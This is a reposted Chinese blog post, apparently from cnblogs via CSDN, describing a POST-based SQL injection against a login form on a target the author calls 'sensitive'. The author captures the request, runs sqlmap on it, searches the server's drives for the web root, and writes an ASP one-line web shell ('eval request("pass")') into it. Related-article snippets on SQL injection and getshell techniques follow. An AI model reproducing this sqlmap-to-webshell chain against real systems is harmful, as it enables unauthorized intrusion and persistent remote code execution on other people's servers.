post注入及提权思路

最新推荐文章于 2024-03-23 23:32:27 发布
最新推荐文章于 2024-03-23 23:32:27 发布
阅读量152 收藏
点赞数
文章标签: javascript shell ViewUI
原文链接:http://www.cnblogs.com/h4ck0ne/p/5154613.html
版权

我们这次的目标有点敏感  性感的马赛克是必须有的

登陆表单 那么我们来看看是不是存在post注入

Setp1:设置代理

   

Step2:账户admin密码随意 提交上去  抓个包

   

把抓到的包复制到本地的一个文本里

   

   

Sqlmap走起

Sqlmap -r "/tmp/binghe" --batch

   

很幸运的

   

后来知道是内网,想连上服务器得拿到shell转发啊

   

怎么拿  先来列磁盘

   

dir c:\   ok

   

Dir d:\  ok

   

Dir e:\ 没有

   

.....

   

dir 列了CD盘都没有列到类似的web目录

   

后来逐个目录列了半个多小时无果

   

操蛋  喝了杯82年的乐事休息下

   

   

Duang 的一下  有了!

   

C磁盘搜索

   

但是搜索什么?

   

 我在那个登陆页面查看源码找到了一个js文件  访问确实存在

   

名为jquery.history.js

执行dir/s/b c:\jquery.history.js C盘内搜索名为jquery.history.js的文件并返回其路径

但是童话里都是骗人的。。。

   

说明这台机器上并不存在本文件

这说明了什么?

今天遇到两次??Real is fuck the dog! 真是日了狗了

   

这里权且不说,我们讲的是个思路  我们来本地模拟一下

   

获得网站根目录

   

c:\binghesec\web\

   

然后

   

echo "<%eval request("pass")%>">c:\binghesec\web\binghesec.asp

   

   

你是不是想问一句话两边带个双引号会影响执行吗? 你试试不就知道了!!!

有大牛说,找不到根目录没关系,咱可以cmd下建虚拟目录嘛。。。目录你妹啊,你看哪个方便!但是思路确实是可行的,就是麻烦了点。

转载于:https://www.cnblogs.com/h4ck0ne/p/5154613.html

weixin_30824479
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入思路详解
12-14
3. **确认注入的存在及类型**:如果测试语句产生了预期的异常或改变了原有查询的结果,那么就可能存在SQL注入。接下来,攻击者会尝试确定数据库类型,因为不同的数据库系统对SQL语法的响应和错误处理是不同的。这...
渗透测试基础-POST注入
weixin_45488495的博客
04-08 2105
渗透测试基础-POST注入POST注入是什么POST注入靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! POST注入是什么 post是一种传参方式,大多出现在各种框处,比如登录框,查询框,和各种与数据库有交互的框。 注入攻击是:用户输入的数据当作代码执行,这里有两个关键点 关键点一:用户能够控制输入 关键点二:原本程序要执行的代码,拼接了用户输入的数据 post注入与get注入没有本质的区别,无非就是一个在表单框执
渗透测试之SQL注入POST型的四种注入手法)、SQL注入绕过手段
Hi~ 土拨鼠
12-11 7064
文章目录使用BurpSuite进行post请求的抓包使用联合查询进行注入:使用报错注入进行注入:布尔盲注:时延查询:SQL注入绕过手段大小写字母绕过双写绕过编码绕过内联注释绕过 POST和GET的区别就是注入点位置发生了变化,在浏览器中已经无法直接进行查看与修改。当然可以借助对应的插件可以完成修改任务。 使用BurpSuite进行post请求的抓包 以Sqli-Lab Less11为例。 查看抓的包 将抓到的包发送到repeater模块,就可以进行重复测试了 初步判断sql语句大概为:select un
渗透测试——万能密码与POST注入
zjdda的博客
05-20 3695
1.万能密码的原理 数据库没有对前端输入的参数的合法性做过率,并且账号和密码 一起输入,可以通过编写恶意语句,将用户与密码的输入结果判断为真,就实现了万能密码的登录。 2.万能密码实例: 查询语句select * from ‘.KaTeX parse error: Double superscript at position 21: …e.' where id=' '̲ and pass=' '; …t_name.’ where id=’ sdadaad’ and pass=’ ‘or’1’=‘1’; 由于
php提权教程,thinkphp 5.x版本代码执行可直接提权getshell
weixin_39647412的博客
03-10 1485
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。影响范围5.x < 5.1.31, <= 5.0.23漏洞分析Thinkphp v5.0.x补丁地址: htt...
后渗透攻击
最新发布
sinat_25635183的博客
03-23 1138
在这个命令中,"upload" 是一个关键词或者命令,后面的 [options] 表示可选的参数,而 src1、src2、src3 则表示要上传的源文件,destination 表示上传的目标位置。实验前提:攻击者利用被攻击的的漏洞,成功进入到了目标机,即在运行了run/exploit命令之后,就开启了一个reverse TCP监听器来监听本地的4444端口,就是攻击者本地的主机地址(LHOST)和端口号(LPORT)。会话受到了用户权限的限制,而这将会严重影响你在目标系统中的活动。
Jquery post传递数组方法实现思路及代码
01-21
以批量删除数据为例 做批量删除会需要传递要删除的数据ID数组 代码如下: function RemoveLog(){ var postModel=[]; //遍历复选框获取要删除的数据ID 存放到数组中 $(“[name=’lid’]”).each(function () { if ($...
sql注入原理及php防注入代码.doc
12-02
SQL注入原理及PHP防注入代码 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在用户输入中注入恶意SQL代码来访问或修改敏感数据。防止SQL注入需要了解SQL注入原理和防止SQL注入的方法。 基本概念 PHP中...
php后台提权,基于ThinkPHP的2个CMS后台GetShell利用
weixin_34170737的博客
03-10 757
* 本文作者:Mochazz,本文属FreeBuf原创奖励计划,未经许可禁止转载文章作者:Mochazz思路作者:szrzvdny0x00 前言ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,由于其简单易用,很多cms都基于该框架改写。然而 Thinkphp在缓存使用却存在缺陷,生成缓存时,Thinkphp会将数据序列化存进一个php文件,这就产生了很大的安全问题。0x01 ...
thinkphp5 漏洞原理分析合集
m0_46689007的博客
11-30 7011
跟进Request.php中method(),Config::get(‘var_method’)提权var_method中的值,var_method的又为_method,这个_method可控,我们传入’__construct’,到$this->{$this->method}($_POST);因为执行的是get方法,跟进get()方法,此方法为读取配置文件,所以我们构造的参数进入get()中就会控制读取内容,后面返回self::$config[$range][$name[0]][$name[1]]。
post表单防止注入
01-22
post表单,这个不知道大家会不会,传上来分享一下,呵呵
靶机-南方数据站源代码存在cookie注入
05-09
靶机-南方数据站源代码存在cookie注入!网站对get和post请求的参数进行过滤,请使用burpsuite修改cookie进行注入
POST注入和HEAD注入
weixin_53026460的博客
09-27 1287
(一)POST注入和普通的注入(联合查询)是没有区别的,它只是根据传参方式不同来判断类型。(二)POST注入的核心在于框,有框就可以尝试下是否存在注入;(三)GET可以直接传递参数,POST更多是存在于框,因为框代表着交互点,像登录框、查询框等各种一般都是通过POST进行传参的,当然这句话也不是必然,我们举一个baidu的例子;像这样在URL栏可以看到的是GET传参;各种框,一般来说都是POST传参,但不绝对,比如上面的baidu首页的例子就不是POST传参;
SQL注入原理-POST注入
T1ngSh0w的博客
09-17 4890
SQL注入原理-POST注入
提权—网站的权限后台漏洞第三方
qi_SJQ_的博客
01-30 4165
1.权限提升: 此处提权指的不是让网站的普通用户获取到管理员的权限(那属于网站的逻辑漏洞)而是我们已经利用网站的漏洞拿到了一些权限乃至webshell后如何利用网站权限进而获取到数据库、操作系统、服务器等的权限。 2.具体有哪些权限需要我们知道和了解掌握的? 后台权限、网站权限、数据库权限、接口权限、系统权限、域控权限等。 1)后台权限(获得方式:爆破、注入猜解、弱口令等):一般网站或应用后台智能操作应用的界面内容、数据图片等信息,无法操作程序的源代码或服务器上的资源文件。(如后台功能存在文件操作的话.
特别详细的POST 注入 思路
qq_42097777的博客
04-08 1万+
post注入是通过对输入框进行传参,可以被带入数据库进行的查询 # 注入的两个条件:1.用户可以控制传参,2.用户输入的语句被带入数据库进行查询 1.查询是否有注入点 对输入框填入一些闭合的符号,看页面是否异常 例如: ’        "          ') &...
渗透测试-----数据包分析
weixin_62693307的博客
02-02 1398
之所以会发两个数据包,则是出于以下考虑:如果服务器先收到“请求头”,则会对其进行校验,如果校验通过,则回复客户端“100 - Continue”,客户端再把”请求体“发给服务器。如果请求被拒了,服务器就回复个400之类的错误,这个交互就终止了。这些都是针对浏览器中的要求,在使用HTTP作为接口进行传输时,就没有这么多条条框框了,此时GET和POST只是HTTP协议中的两种请求方式,而HTTP协议是基于TCP/IP的应用层协议,无论GET还是POST,用的都是同一个传输层协议,所以在传输上没有区别。
渗透测试-xss漏洞之反射型(post)获取用户密码
lza20001103的博客
04-24 3572
xss之反射型(post)获取用户密码
sqlmap之(六)----POST登陆框注入实战
热门推荐
fendo
02-28 8万+
利用sqlmap进行POST注入,常见的有三种方法: 注入方式一: 1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下 2.列数据库: sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs 注:-r表示加载一个文件,
sqlmap post注入方法
09-20
在使用post注入方法时,可以通过以下步骤进行操作: 1. 使用`-u`参数指定目标URL,例如:`-u "http://xxx.xxx.com/Login.asp"` 2. 使用`--data`参数指定POST请求的数据,例如:`--data "n=1&p=1"` 3. 输入命令`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值